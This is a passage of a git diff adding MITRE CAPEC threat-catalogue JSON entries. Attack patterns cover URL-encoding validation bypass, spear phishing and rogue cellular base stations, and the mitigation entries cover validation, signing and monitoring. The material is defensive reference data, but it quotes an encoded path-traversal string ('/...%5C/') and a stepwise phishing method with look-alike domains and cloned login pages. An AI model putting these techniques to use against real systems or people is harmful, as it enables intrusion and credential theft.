"http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run 
Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json new file mode 100644 index 0000000000000000000000000000000000000000..cd430c4354c8e745e498e5d65653e8e4a989beea --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json 
@@ -0,0 +1,123 @@ +{ + "id": "bundle--e779cea7-a257-4b9a-9385-60d3d46dfc4d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. 
As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.", + "external_references": [ + { + "external_id": "CAPEC-163", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Internal Spearfishing", + "external_id": "T1534", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1534" + }, + { + "description": "Phishing: Spearfishing Attachment", + "external_id": "T1566.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/001" + }, + { + "description": "Phishing: Spearfishing Link", + "external_id": "T1566.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/002" + }, + { + "description": "Phishing: Spearfishing via Service", + "external_id": "T1566.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/003" + }, + { + "description": "Phishing for Information: Spearfishing Service", + "external_id": "T1598.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/001" + }, + { + "description": "Phishing for Information: Spearfishing Attachment", + "external_id": "T1598.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/002" + }, + { + "description": "Phishing for Information: Spearfishing Link", + "external_id": "T1598.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/003" + } + ], + "id": "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Spear Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + 
"attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Accountability": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authentication": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authorization": [ + "Gain Privileges (Privilege Escalation)" + ], + "Confidentiality": [ + "Read Data (Information Leakage)" + ], + "Integrity": [ + "Modify Data (Data Modification)" + ], + "Non-Repudiation": [ + "Gain Privileges (Privilege Escalation)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity that happened in a different area from where they live (details might be provided by the spear phishers) and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An adversary has just collected the target's online banking information which can now be used by them to log into the target's bank account and transfer money to a bank account of the adversary's choice.", + "An adversary can leverage a weakness in the SMB protocol by sending the target, an official looking e-mail from their employer's IT Department stating that their system has vulnerable software, which they need to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. 
Once the link is clicked, the target is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate the target to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \"Pass The Hash\" attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain useful contextual detailed information about the targeted user or organization: An adversary collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.

  2. Techniques
    Conduct web searching research of target. See also: CAPEC-118.
    Identify trusted associates, colleagues and friends of target. See also: CAPEC-118.
    Utilize social engineering attack patterns such as Pretexting. See also: CAPEC-407.
    Collect social information via dumpster diving. See also: CAPEC-406.
    Collect social information via traditional sources. See also: CAPEC-118.
    Collect social information via Non-traditional sources. See also: CAPEC-118.

Experiment

  1. Optional: Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

  2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).
    Optionally obtain a legitimate SSL certificate for the new domain name.
  3. Optional: Explore legitimate website and create duplicate: An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

  4. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look at feel, but contain completely new content.
  5. Optional: Build variants of the website with very specific user information e.g., living area, etc.: Once the adversary has their website which duplicates a legitimate website, they need to build very custom user related information in it. For example, they could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.

  6. Techniques
    Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim.

Exploit

  1. Convince user to enter sensitive information on adversary's site.: An adversary sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to adversary's website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

  2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.
  3. Use stolen credentials to log into legitimate site: Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

  4. Techniques
    Log in to the legitimate site using another user's supplied credentials.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "None. Any user can be targeted by a Spear Phishing attack." + ], + "x_capec_resources_required": [ + "An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into." + ], + "x_capec_skills_required": { + "Medium": "Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json new file mode 100644 index 0000000000000000000000000000000000000000..72b22270a2d6ed061bcc019c4a3b1995724ed864 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json 
@@ -0,0 +1,48 @@ +{ + "id": "bundle--cb01b858-6f27-4b56-8861-332768ef1f53", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json new file mode 100644 index 0000000000000000000000000000000000000000..d0989ef3315c8210ee6ad6d160ac4173d90a2170 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--7c8098cc-f797-447f-ae51-e45a0be1f42d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json new file mode 100644 index 0000000000000000000000000000000000000000..8b06b986ed195c23aaefa1727c380e5f21c29254 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--d9a984dc-c196-4560-8405-64f1b6fc101f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json new file mode 100644 index 0000000000000000000000000000000000000000..eefbdceac22f00c5c4905ba4d637e0d87e6df631 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--df970e81-5a30-432a-8646-978f6579c7cb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json new file mode 100644 index 0000000000000000000000000000000000000000..ce843fbd052f49b74071cbc0f6af1e405ae18e8c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--3cb7449a-a5f6-4844-9b38-165123de5348", + "objects": [ + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json new file mode 100644 index 0000000000000000000000000000000000000000..d41307f310f34c32406130d0f3d28529d6661831 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--33cb3a87-2187-43e9-bae7-7c0168aaf616", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json new file mode 100644 index 0000000000000000000000000000000000000000..2d1768d5177732820daeeda72915cf6443061f60 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--5f0b8f8f-5e2e-4228-936a-ff8830600b1f", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json new file mode 100644 index 0000000000000000000000000000000000000000..f767333385ff8c7324761a54e3a8445106cd7450 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--815f5043-3812-4e34-86dd-8cb362c94f14", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json new file mode 100644 index 0000000000000000000000000000000000000000..a20e5d19e11d4c16775f4f57f6e261e20d5fba82 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--d9dc7b17-75fb-4765-a81b-6ee2c193db64", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json new file mode 100644 index 0000000000000000000000000000000000000000..2948fa5db10894f5175cbe631ccfbd6e68ef5d8f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--69ddbada-add2-478d-a971-fa6d67c5d412", + "objects": [ + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json new file mode 100644 index 0000000000000000000000000000000000000000..ea49a817d973f4944df6b2c67e927f66d94ae90a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d25fae51-b533-4d38-aed6-30e6ffdc116a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json new file mode 100644 index 0000000000000000000000000000000000000000..a896a4cb5c760db007736b29ee0ff5606d04bfbe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--2bc1110c-1df5-46a0-9863-127a91c44be6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json new file mode 100644 index 0000000000000000000000000000000000000000..b419f49597722002009ce3e81231a5c94887b866 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--cddb353e-2b39-420b-894a-7e2c00bc8aad", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json new file mode 100644 index 0000000000000000000000000000000000000000..0f54edfd1e22527264a29803ad3a25ed96e108ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e30a41ea-3ed1-4319-95a9-4f6b81cf752d", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json new file mode 100644 index 0000000000000000000000000000000000000000..39770fd89ac144995003f0e750067e01ce2208ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json 
